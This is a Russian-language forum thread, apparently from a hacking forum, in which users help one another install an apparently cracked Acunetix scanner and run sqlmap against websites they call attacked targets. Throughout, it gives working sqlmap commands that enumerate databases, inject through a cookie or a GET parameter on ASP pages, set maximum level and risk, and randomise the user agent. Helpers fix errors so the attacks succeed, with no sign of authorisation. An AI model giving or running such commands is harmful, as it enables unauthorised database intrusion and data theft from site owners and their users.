Статья Сканируем и раскручиваем SQL Injection с умом

Посмотри куда именно он редиректит.
Если при заходе на site.com тебя кидает на www.site.com, то и в заголовок хоста ты должен вписывать www.site.com
Host: www.site.com
запустил setup все скачялось но нету директории C:/ProgramData/Acunetix/shared/license/ подскажите
как исправить?
 
Должен быть такой путь: C:\ProgramData\Acunetix\shared\license
Перепроверь.

Посмотреть вложение 32358
оно установилось в program files x86 может это быть связано с тем что я неправильно отредактировал файл hosts?
 
оно установилось в program files x86 может это быть связано с тем что я неправильно отредактировал файл hosts?
В консоль команду сделай: where /R C:\ license_info.json
Найдет директорию где файл лицензии окуня лежит. Вместо "C:\" можешь указать другой диск, если используешь какой то другой.
 
В консоль команду сделай: where /R C:\ license_info.json
Найдет директорию где файл лицензии окуня лежит. Вместо "C:\" можешь указать другой диск, если используешь какой то другой.
invalid syntax. Default argument is missing
 
Составил я такую команду -u https://jandd.com --dbs --dbms="Microsoft SQL Server" --data="visitorID=*" --level=5 --risck=3 --batch --random-agent
Но мап нечего не выдал, подскажите пожалуйста что делаю не так?
 

Вложения

  • Снимок.PNG
    Снимок.PNG
    3.4 КБ · Просмотры: 54
Составил я такую команду -u https://jandd.com --dbs --dbms="Microsoft SQL Server" --data="visitorID=*" --level=5 --risck=3 --batch --random-agent
Но мап нечего не выдал, подскажите пожалуйста что делаю не так?
Посмотри полный путь.
--data="visitorID=17421627*"
 
Составил я такую команду -u https://jandd.com --dbs --dbms="Microsoft SQL Server" --data="visitorID=*" --level=5 --risck=3 --batch --random-agent
Но мап нечего не выдал, подскажите пожалуйста что делаю не так?
На скрине написано же, что инъекция в куках, а ты куда инжектить пытаешься? --data - это POST запрос. Вместо этого указывай --cookie="visitorID=17421627*" либо --headers="Cookie: visitorID=17421627*"

--risck=3
--risk=3

URL в кавчки взять ""
 
Последнее редактирование:
а как крутить GET?
параметр itemid
вводил так -p itemid и так -p "itemid" и так -p "itemid=*"
но мап выбивает ошибку в начале сканирования [CRITICAL] all testable parameters you provided are not present within the given request data и заканчивает скан
 
а как крутить GET?
параметр itemid
вводил так -p itemid и так -p "itemid" и так -p "itemid=*"
но мап выбивает ошибку в начале сканирования [CRITICAL] all testable parameters you provided are not present within the given request data и заканчивает скан
А как ты запрос мапу подаешь? Полный запрос который в мап делаешь скинь сюда, атакуемый сайт измени на test.com
 
А как ты запрос мапу подаешь? Полный запрос который в мап делаешь скинь сюда, атакуемый сайт измени на test.com
sqlmap.py -u https://site.com/mall/carts/normal/wishltem_db.asp -p"wishID=*" --dbs --dbms="Microsoft SQL Server" --level=5 --risk=3 --random-agent --batch
 
sqlmap.py -u https://site.com/mall/carts/normal/wishltem_db.asp/wishID=* --dbs --dbms="Microsoft SQL Server" --level=5 --risk=3 --random-agent --batch
так?
Ля чел, ты чем нашел уязвимость на этом сайте? Предполагаю акунетиксом? Скинь что он показал тебе, сайт атакуемый замажь.
 
Ля чел, ты чем нашел уязвимость на этом сайте? Предполагаю акунетиксом? Скинь что он показал тебе, сайт атакуемый замажь.
 

Вложения

  • Снимок2.PNG
    Снимок2.PNG
    4.4 КБ · Просмотры: 55
  • Снимок3.PNG
    Снимок3.PNG
    4.2 КБ · Просмотры: 55
Код:
sqlmap.py -u "https://site.com/mall/html_popup.asp?itemid=*" --dbs --dbms="Microsoft SQL Server" --level=5 --risk=3 --random-agent --batch

Такие вещи скринами не кидай, лучше текстом вставляй.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх